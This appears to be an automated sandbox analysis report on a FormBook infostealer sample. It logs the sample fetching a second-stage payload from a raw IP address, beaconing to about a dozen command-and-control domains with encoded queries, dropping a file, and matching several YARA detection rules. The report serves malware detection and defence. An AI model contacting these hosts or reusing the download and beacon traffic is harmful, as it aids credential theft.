Source: global traffic	HTTP traffic detected: GET /be53/?oT5=4qNm2ZAzgWMrZOo7jvgkf6t6S1zohoxxGdlmv96XcHnPlRQdh59KN22s8WnNeaZqgwFd&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.nisekopiraestate.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=aYnY9ags8h7dJGIqJu8WrtwFY6Xckqfyut2fSd51fLqlVrU9YICaztEIWdsYD/JWvyc3&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.embhajeflexiveis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=MQi5ASxzFfNSWJAsQey1B3Zv+H04FroupisBE3nsXrFfvTv9pcCErlrODjvbeqMcqyEj&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.crossdressersespana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=yK7OrObBKTGz0pPpQHDZ1Ug64ujsVcJjhTRwQrEw26qJt5FpmjfB1P4zEa5Vqv0dsIGr&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.fetch-a-estudia-y-trabaja.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=s1julRGmed5yUPqy1/u/CkIYofLXefI1rcsRJX7fFh3jFZdFBAK63iIEYWpG9dFdYT7A&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.icolut.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=RF7sC7z4FipVNmwbw+jPCmgIeBX2AJ2lmBul9Kk5zXkXtv+ecrMoeWKP8G+1HCfitgV0&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.enjoythearoma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=M7U+edu2snUk3BO2AwMlCt4TCm8eU2rBG6AV5RYZgcPXP8tLgUP1/BuAtIMTBCmSTczO&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.gota-africana.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=AooPDu4QOB27lZfkSgAw9MoUMoboYKOvBuVKrBFHr89pQNaRTMdrm8d0/nwlB7CJGzGJ&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.2004256.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=INULBbnUeQ+YoPWvOon16eoyazYMd+BlZq05NDhrWdwyda5UeJingftxUrbq982m+Gct&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.arctiquevarare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=h5pbAFevEiRk+Avdv7HqEwAnW0lU2xxIsSfcH8MPtJpxQdX8NQy8CxMG+zlahwfzy/4y&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.1wisas.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=sQvIjz7Dk+mkzHCVj0e0mbJWFXTK4edtAvhtCoD78Nc3iBQtlhdxvYB5uNMhFvAqrChT&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.freightbyu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=W5YYhY2/K70SzZEtnRI8Jip6RTp4sU+3O6FUrLQxP49b9zfo6u48Sf373m/nyXFaVrlZ&pZbp=3fZ0Ch7PbvU HTTP/1.1Host: www.cristianlealojeda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=b4uU6M+WZucAv+WJidAYZIorFrJJQB5N2eWFLX1uWjj6vvX3SZY9fvZVqnoqYhBOrIG3&pZbp=3fZ0Ch7PbvU HTTP/1.1Host: www.largesxiaothose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 76.223.105.230 76.223.105.230
Source: Joe Sandbox View	IP Address: 76.223.105.230 76.223.105.230

Source: global traffic

HTTP traffic detected: GET /wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: 34.138.169.8Cache-Control: no-cache

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeDate: Wed, 05 Jul 2023 12:08:27 GMTServer: ApachePragma: no-cacheX-UA-Compatible: IE=edgeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: PHPSESSID=12b4e456ca078576ee8623bc6ce5b011; path=/Data Raw: 66 39 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 43 48 45 51 20 49 4e 56 4f 43 41 54 49 4f 4e 20 54 41 47 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 0a 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6f 62 2e 63 68 65 71 7a 6f 6e 65 2e 63 6f 6d 2f 63 6c 69 63 6b 74 72 75 65 5f 69 6e 76 6f 63 61 74 69 6f 6e 2e 6a 73 3f 69 64 3d 31 34 30 34 36 22 0a 64 61 74 61 2d 63 68 3d 22 63 68 65 71 34 70 70 63 22 20 63 6c 61 73 73 3d 22 63 74 5f 63 6c 69 63 6b 74 72 75 65 5f 31 34 30 34 36 22 3e 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 20 45 4e 44 20 43 48 45 51 20 49 4e 56 4f 43 41 54 49 4f 4e 20 54 41 47 20 2d 2d 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4f 6c 64 65 72 20 44 61 74 69 6e 67 20 4f 6e 6c 69 6e 65 20 2d 20 4f 6c 64 65 72 20 44 61 74 69 6e 67 20 66 6f 72 20 74 68 65 20 4f 76 65 72 20 34 30 26 23 30 33 39 3b 73 20 69 6e 20 74 68 65 20 55 4b 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4f 6c 64 65 72 20 44 61 74 69 6e 67 20 4f 6e 6c 69 6e 65 20 69 73 20 74 68 65 20 73 69 74 65 20 66 6f 72 20 74 68 6f 73 65 20 6f 66 20 75 73 20 73 74 69 6c 6c 20 79 6f 75 6e 67 20 61 74 20 68 65 61 72 74 20 61 6e 64 20 69 73 20 74 68 65 20 6c 65 61 64 69 6e 67 20 73 65 6e 69 6f 72 73 20 64 61 74 69 6e 67 20 73 69 74 65 20 69 6e 20 74 68 65 20 55 4b 20 66 6f 72 20 74 68 65 20 6f 76 65 72 20 34 30 e2 80 99 73 21 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 69 2d 64 4c 62 57 79 50 71 45 6d 61 4f 61 34 57 65 56 37 51 51 4d
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.22.0Date: Wed, 05 Jul 2023 12:11:32 GMTContent-Type: text/htmlContent-Length: 153Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.0</center></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8
Source: unknown	TCP traffic detected without corresponding DNS query: 34.138.169.8

Source: hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/
Source: hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp, hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin
Source: hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binL/K
Source: hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binO
Source: hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.binQ._
Source: hi38VYWujz.exe, 0000000B.00000002.45264895443.00000000068B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://34.138.169.8/wp-content/themes/seotheme/IpOVHkNfbEqHd29.bind(#
Source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: hi38VYWujz.exe, 00000006.00000000.44360903353.000000000040A000.00000008.00000001.01000000.00000004.sdmp, hi38VYWujz.exe, 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmp, hi38VYWujz.exe, 0000000B.00000000.44918585581.000000000040A000.00000008.00000001.01000000.00000004.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: hi38VYWujz.exe, 0000000B.00000001.44920374076.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: hi38VYWujz.exe, 0000000B.00000001.44920374076.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: hi38VYWujz.exe, 0000000B.00000001.44920374076.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214

Source: unknown

DNS traffic detected: queries for: www.josephajaogo.africa

Source: global traffic	HTTP traffic detected: GET /wp-content/themes/seotheme/IpOVHkNfbEqHd29.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0Host: 34.138.169.8Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=4qNm2ZAzgWMrZOo7jvgkf6t6S1zohoxxGdlmv96XcHnPlRQdh59KN22s8WnNeaZqgwFd&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.nisekopiraestate.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=aYnY9ags8h7dJGIqJu8WrtwFY6Xckqfyut2fSd51fLqlVrU9YICaztEIWdsYD/JWvyc3&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.embhajeflexiveis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=MQi5ASxzFfNSWJAsQey1B3Zv+H04FroupisBE3nsXrFfvTv9pcCErlrODjvbeqMcqyEj&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.crossdressersespana.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=yK7OrObBKTGz0pPpQHDZ1Ug64ujsVcJjhTRwQrEw26qJt5FpmjfB1P4zEa5Vqv0dsIGr&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.fetch-a-estudia-y-trabaja.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=s1julRGmed5yUPqy1/u/CkIYofLXefI1rcsRJX7fFh3jFZdFBAK63iIEYWpG9dFdYT7A&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.icolut.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=RF7sC7z4FipVNmwbw+jPCmgIeBX2AJ2lmBul9Kk5zXkXtv+ecrMoeWKP8G+1HCfitgV0&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.enjoythearoma.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=M7U+edu2snUk3BO2AwMlCt4TCm8eU2rBG6AV5RYZgcPXP8tLgUP1/BuAtIMTBCmSTczO&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.gota-africana.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=AooPDu4QOB27lZfkSgAw9MoUMoboYKOvBuVKrBFHr89pQNaRTMdrm8d0/nwlB7CJGzGJ&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.2004256.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=INULBbnUeQ+YoPWvOon16eoyazYMd+BlZq05NDhrWdwyda5UeJingftxUrbq982m+Gct&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.arctiquevarare.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=h5pbAFevEiRk+Avdv7HqEwAnW0lU2xxIsSfcH8MPtJpxQdX8NQy8CxMG+zlahwfzy/4y&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.1wisas.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=sQvIjz7Dk+mkzHCVj0e0mbJWFXTK4edtAvhtCoD78Nc3iBQtlhdxvYB5uNMhFvAqrChT&v0Dd=aPFdKLwPWjPXZR-p HTTP/1.1Host: www.freightbyu.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=W5YYhY2/K70SzZEtnRI8Jip6RTp4sU+3O6FUrLQxP49b9zfo6u48Sf373m/nyXFaVrlZ&pZbp=3fZ0Ch7PbvU HTTP/1.1Host: www.cristianlealojeda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /be53/?oT5=b4uU6M+WZucAv+WJidAYZIorFrJJQB5N2eWFLX1uWjj6vvX3SZY9fvZVqnoqYhBOrIG3&pZbp=3fZ0Ch7PbvU HTTP/1.1Host: www.largesxiaothose.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\hi38VYWujz.exe

Code function: 6_2_00405402 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

6_2_00405402

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\hi38VYWujz.exe

File created: C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra\Freons\Entrenching\Samsen\pvscsi.cat

Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 0000000D.00000002.49454963074.0000000014854000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.49413018523.00000000031B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.45164539590.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: hi38VYWujz.exe PID: 7828, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: hi38VYWujz.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 0000000D.00000002.49454963074.0000000014854000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.49413298437.00000000031E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.45278753504.0000000036750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000E.00000002.49412276825.0000000002B30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
